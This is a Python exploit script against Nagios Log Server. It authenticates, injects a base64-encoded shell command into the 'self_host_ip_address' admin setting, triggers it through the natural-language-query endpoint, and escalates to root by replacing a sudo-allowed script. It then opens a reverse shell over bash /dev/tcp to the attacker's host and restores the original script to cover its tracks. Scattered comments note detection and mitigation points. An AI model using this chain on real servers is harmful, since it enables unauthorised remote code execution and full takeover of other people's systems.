import requests
import sys
import base64

## Usage
# $ python3 root_exploit.py <nagios-logserver-url> <username> <password> <local-ip> <local-port>
# Flow shown below: authenticate -> save a shell-metacharacter value into the
# `self_host_ip_address` global setting -> request the natural-language-query
# endpoint, which is where the stored value is expected to be evaluated.
# Detection/mitigation notes are inline; nothing here is validated beyond what
# the requests themselves return.

host = sys.argv[1]        # base URL; the f-strings below add no '/' so it must end with one
username = sys.argv[2]
password = sys.argv[3]
local_ip = sys.argv[4]    # where the interactive shell in root_command connects back to
local_port = sys.argv[5]

# Both schemes are sent through a local intercepting proxy on 127.0.0.1:8080
# (applied to the session below); nothing works if that proxy is not running.
proxies = dict.fromkeys(['http','https'],'http://127.0.0.1:8080')

login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'          # where the setting is written
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query' # where the setting is consumed
get_output = f'{host}nagioslogserver/scripts/test.txt'                 # only used if the command is swapped for one that writes here (see note below)

# reverse shell, can replace with any command Ex: `id>/var/www/html/nagioslogserver/www/scripts/test.txt` if you just want to see `root` run a command and get the output from the webserver
## `nc -nlvp <local_port>` to listen for incoming connection

# Runs as root (via the sudo call in privesc_shell_script). After launching the
# shell in the background it puts the original reconfigure_ncpa.sh back from the
# .bak copy and restores root ownership, so the on-disk modification is
# short-lived. Defenders: a post-hoc diff of that script will look clean; file
# integrity monitoring / auditd on writes and renames under
# /usr/local/nagioslogserver/scripts/ is what catches this sequence.
root_command = f"""bash -c '(bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1)&';
cp /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chown root:root /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh"""
root_command_b64 = base64.b64encode(root_command.encode()).decode()

# Runs as the web-server user (the injected command). It swaps the sudo-allowed
# script for the payload, makes it executable and invokes it through sudo.
# The chain only works if that user can (a) write to the scripts directory and
# (b) run this exact path under sudo without a password -- presumably the
# shipped sudoers rule; a root-owned, non-writable location for anything
# referenced from sudoers removes step (b) as a privesc path. TODO confirm
# against the deployed sudoers entry.
privesc_shell_script = f"""mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '{root_command_b64}' |base64 -d > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
"""

# Base64-wrapping the script means the value stored in the setting is a single
# token with no quotes or newlines.
base64_cmd = base64.b64encode(privesc_shell_script.encode()).decode()

cmd = f"echo {base64_cmd}|base64 -d|bash"


with requests.Session() as s:
    s.proxies.update(proxies)
    s.verify = False   # TLS certificate verification disabled for the whole session

    # The CSRF token is read from the `csrf_ls` cookie set by the login page and
    # re-sent as a form field on every POST below.
    csrf_req = s.get(login_url)
    csrf_ls = csrf_req.cookies['csrf_ls']
    
    login_payload = {
        'csrf_ls': csrf_ls,
        'username': username,
        'password': password
    }
    # allow_redirects=False so the Set-Cookie from the login response itself is inspected.
    login_req = s.post(login_url, data=login_payload, allow_redirects=False)
    # Success is inferred from the presence of the `ls_session` cookie, nothing else.
    if 'ls_session' not in login_req.cookies:
        print("[-] Incorrect credentials")
        exit()
    
    print(f"[+] Login worked, adding command injection to self_host_ip_address")


    # The command is stored in the `self_host_ip_address` setting wrapped in
    # backticks, i.e. it relies on the value later being placed unquoted into a
    # shell command line. Mitigation on the application side: validate this
    # field as an IP/hostname and never pass it through a shell. Detection: a
    # POST to admin/globals whose self_host_ip_address is not an address
    # (contains backticks, '|', 'base64') is a high-fidelity indicator.
    cmd_injection_payload = {
        "csrf_ls": csrf_ls,
        "natural_language_query": 1,
        "nlp_disclaimer": "on",
        "ai_provider": "self_hosted",
        "self_host_ip_address": f"`{cmd}`",
        "ai_port": 8000,
        "saveglobals":1
    }
    cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)

    # Only an HTTP-level failure is treated as fatal; the setting being echoed
    # back in the page is taken as a hint, not as confirmation.
    if not cmd_injection_res.ok:
        print(f"[-] Cmd injection probably didn't work")
        exit()
    if cmd not in cmd_injection_res.text:
        print(f"[*] Command didn't show up in the response text, still check if it works...")
    
    print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")

    # The stored value is expected to be evaluated when this endpoint is hit;
    # requires the same authenticated session.
    nlq_res = s.get(nlq_url)

    # A non-2xx here does not mean the command did not run -- the script only
    # points at get_output, which is populated only when root_command is changed
    # to write there (see the note above root_command).
    if not nlq_res.ok:
        print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")